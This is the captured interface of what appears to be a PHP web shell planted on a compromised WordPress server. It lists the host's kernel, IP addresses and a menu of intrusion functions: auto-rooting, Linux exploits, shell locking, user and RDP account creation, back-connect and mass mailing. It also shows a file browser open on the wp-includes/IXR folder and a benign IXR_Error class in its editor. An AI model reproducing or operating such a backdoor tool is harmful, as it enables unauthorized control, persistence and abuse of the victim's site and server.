Linux europe1.dehosting.ir 3.10.0-962.3.2.lve1.5.70.el7.x86_64 #1 SMP Mon May 30 08:45:55 UTC 2022 x86_64
LiteSpeed
: 23.88.8.221 | : 18.117.94.180
Cant Read [ /etc/named.conf ]
7.4.33
gamefaq1
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gamefaq1 /
public_html /
wp-includes /
IXR /
[ HOME SHELL ]
Name
Size
Permission
Action
.htaccess
237
B
-r-xr-xr-x
class-IXR-base64.php
414
B
-rw-r--r--
class-IXR-client.php
4.67
KB
-rw-r--r--
class-IXR-clientmulticall.php
1.23
KB
-rw-r--r--
class-IXR-date.php
1.65
KB
-rw-r--r--
class-IXR-error.php
854
B
-rw-r--r--
class-IXR-introspectionserver....
5.2
KB
-rw-r--r--
class-IXR-message.php
8
KB
-rw-r--r--
class-IXR-request.php
927
B
-rw-r--r--
class-IXR-server.php
6.51
KB
-rw-r--r--
class-IXR-value.php
3.7
KB
-rw-r--r--
error_log
1.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-IXR-error.php
<?php /** * IXR_Error * * @package IXR * @since 1.5.0 */ class IXR_Error { var $code; var $message; /** * PHP5 constructor. */ function __construct( $code, $message ) { $this->code = $code; $this->message = htmlspecialchars($message); } /** * PHP4 constructor. */ public function IXR_Error( $code, $message ) { self::__construct( $code, $message ); } function getXml() { $xml = <<<EOD <methodResponse> <fault> <value> <struct> <member> <name>faultCode</name> <value><int>{$this->code}</int></value> </member> <member> <name>faultString</name> <value><string>{$this->message}</string></value> </member> </struct> </value> </fault> </methodResponse> EOD; return $xml; } }
Close